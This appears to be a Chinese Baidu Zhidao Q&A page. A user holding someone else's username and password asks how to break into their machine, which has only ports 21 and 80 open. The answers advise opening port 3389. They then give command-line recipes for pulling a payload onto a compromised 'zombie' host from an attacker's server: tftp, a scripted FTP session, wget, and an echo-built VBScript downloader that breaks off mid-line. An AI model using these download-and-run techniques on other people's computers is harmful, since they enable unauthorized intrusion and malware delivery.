我有对方用户名和密码,对方只开启21和80俩端口我该怎么做?

来源:百度知道 编辑:UC知道 时间:2024/06/28 13:32:43
我有对方用户名和密码,对方只开启21和80俩端口我该怎么做?
详细步骤及原理,谢谢!呵呵
外网后台登陆禁止怎么解决啊?

你想访问对方电脑?
使用XP的远程访问

没有办法!~除非你自己去把他电脑的3389端口打开!

先在自己某机器上建个tftp服务器,如执行tftpd32.exe,
再将文件(sample.exe)上传到别的机器中(肉鸡),
肉鸡cmd中执行: tftp -i 服务器ip get sample.exe

ftp法
肉鸡cmd中执行:
echo open ftp服务器ip [端口]>ftp.txt
echo username>>ftp.txt
echo password>>ftp.txt
echo get sample.exe>>ftp.txt
echo bye>>ftp.txt
ftp -s:ftp.txt
del ftp.txt

工具法
利用wineggdrop的wget.exe
肉鸡cmd中执行:wget 网站/sample.exe

利用dl.vbe法
肉鸡cmd中执行:
echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject ("microsoft.xmlhttp") >>dl.vbe
echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
echo aso.type=1:aso.open:aso.writeweb.responsebody:aso.saveto file .arguments(1),2:e